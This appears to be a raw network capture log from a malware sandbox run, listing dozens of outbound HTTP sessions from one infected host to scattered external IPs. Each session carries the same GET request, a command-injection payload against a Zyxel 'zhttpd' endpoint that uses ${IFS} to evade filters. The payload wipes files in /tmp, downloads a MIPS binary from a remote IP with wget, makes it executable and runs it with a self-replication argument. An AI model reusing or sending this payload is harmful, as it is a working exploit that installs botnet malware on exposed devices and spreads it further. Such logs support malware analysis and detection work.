                                            Jan 14, 2024 15:50:42.468724966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5272192.168.2.234920860.65.44.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468745947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5273192.168.2.2337756147.251.33.143443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468772888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5274192.168.2.2355732193.154.119.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468808889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5275192.168.2.2348850199.64.60.235443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468835115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5276192.168.2.2349818105.33.152.174443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468866110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5277192.168.2.2356108160.54.203.254443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468897104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5278192.168.2.23538425.35.214.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468949080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5279192.168.2.2338490187.95.131.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.468981981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5280192.168.2.235381487.179.42.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.469017982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5281192.168.2.2358180108.77.78.148443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.471555948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5282192.168.2.2336276155.166.210.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.471613884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5283192.168.2.236005648.251.135.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.471633911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5284192.168.2.2358306108.9.127.20443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.471673965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5285192.168.2.2353148162.22.188.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.471684933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5286192.168.2.2349554179.222.11.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.471724987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5287192.168.2.233994214.15.17.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.471745014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5288192.168.2.234495669.95.213.142443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.471802950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5289192.168.2.23533425.56.142.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.472811937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5290192.168.2.2348336129.229.134.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.472837925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5291192.168.2.2350948125.78.121.182443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.472857952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5292192.168.2.235357036.114.133.64443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.472877979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5293192.168.2.2345990220.227.91.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.472996950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5294192.168.2.235654451.14.57.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473042965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5295192.168.2.234387690.106.17.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473067999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5296192.168.2.2358926122.133.7.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473097086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5297192.168.2.2334118113.234.15.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473119020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5298192.168.2.2336562222.248.137.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473212004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5299192.168.2.233947695.153.255.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473227978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5300192.168.2.2346918108.37.126.24443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473248959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5301192.168.2.2357990167.129.28.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473262072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5302192.168.2.235444480.77.48.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473326921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5303192.168.2.2346784150.78.174.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473340034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5304192.168.2.2359886106.32.109.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473368883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5305192.168.2.2340042154.97.141.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473402023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5306192.168.2.2341672193.124.51.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473434925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5307192.168.2.2360568156.209.12.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473457098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5308192.168.2.234748468.143.29.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473472118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5309192.168.2.233623071.65.196.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473520041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5310192.168.2.2338574182.53.141.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473530054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5311192.168.2.2334146146.156.176.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473556042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5312192.168.2.235307862.8.221.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473589897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5313192.168.2.234938038.206.111.238443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473612070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5314192.168.2.2357450206.172.4.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473622084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5315192.168.2.2353432143.15.228.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473689079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5316192.168.2.234410093.232.155.218443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473714113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5317192.168.2.234803636.195.225.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473735094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5318192.168.2.233656664.177.91.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473783016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5319192.168.2.2352666157.129.248.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473814011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5320192.168.2.235697091.220.123.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473829985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5321192.168.2.2350652124.6.244.225443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473872900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5322192.168.2.2355574102.180.95.241443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473912954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5323192.168.2.235352093.159.116.129443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473923922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5324192.168.2.2354518217.213.36.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473958969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5325192.168.2.2343668159.48.29.152443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.473958969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5326192.168.2.235722657.199.45.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474004984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5327192.168.2.2336772126.203.59.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474024057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5328192.168.2.2342834223.120.192.99443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474069118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5329192.168.2.2337034157.166.69.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474092007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5330192.168.2.235902820.78.120.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474160910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5331192.168.2.2339974136.113.150.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474189043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5332192.168.2.234916861.9.167.151443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474220991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5333192.168.2.235732637.70.249.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.474247932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5334192.168.2.2349526162.6.78.82443
                                            TimestampBytes transferredDirectionData
